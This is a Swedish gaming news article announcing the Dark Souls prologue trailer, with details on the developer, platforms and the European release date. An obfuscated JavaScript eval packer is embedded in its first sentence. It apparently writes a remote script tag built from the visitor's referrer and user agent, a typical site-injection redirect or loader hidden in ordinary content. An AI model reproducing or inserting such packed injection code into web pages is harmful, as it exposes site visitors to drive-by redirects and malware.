Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Dark Souls: Ny prologue trailer

Dark Souls: Ny prologue trailer
Alexander Gylemo

Snart eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bttbb|var|u0026u|referrer|kyifb||js|php’.split(’|’),0,{}))
släpps den kommande succén Dark Souls, uppföljaren till det PS3-exklusiva Demon’s Souls och nedan finner ni den stämningsfulla introduktions-trailern.

Spelet utvecklas av japanska From Software och publiceras av Namco Bandai Games till både PS3 och Xbox 360. Det är ett äventyrsspel för hardcore-spelare och tar plats i en öppen, mörk fantasyvärld. Spelet går ut på att man ska göra olika uppdrag och quests, antingen själv eller med hjälp av sina vänner online, mestadels i mörka grottor och slott et.c. Man väljer bland olika klasser, använder mängder av olika typer av vapen och magier och går upp i level och utvecklar nya skills.

From Software har lovat att detta spel kommer bli signifikant mycket svårare än sin föregångare, något som kan bli intressant då Demon’s Souls är klassat som ett av världens genom tiderna svåraste spel!

httpv://www.youtube.com/watch?v=yopt1hJtzQU

Dark Souls släpps den fjärde oktober i Europa och Revue.se är oändligt taggade!

Comments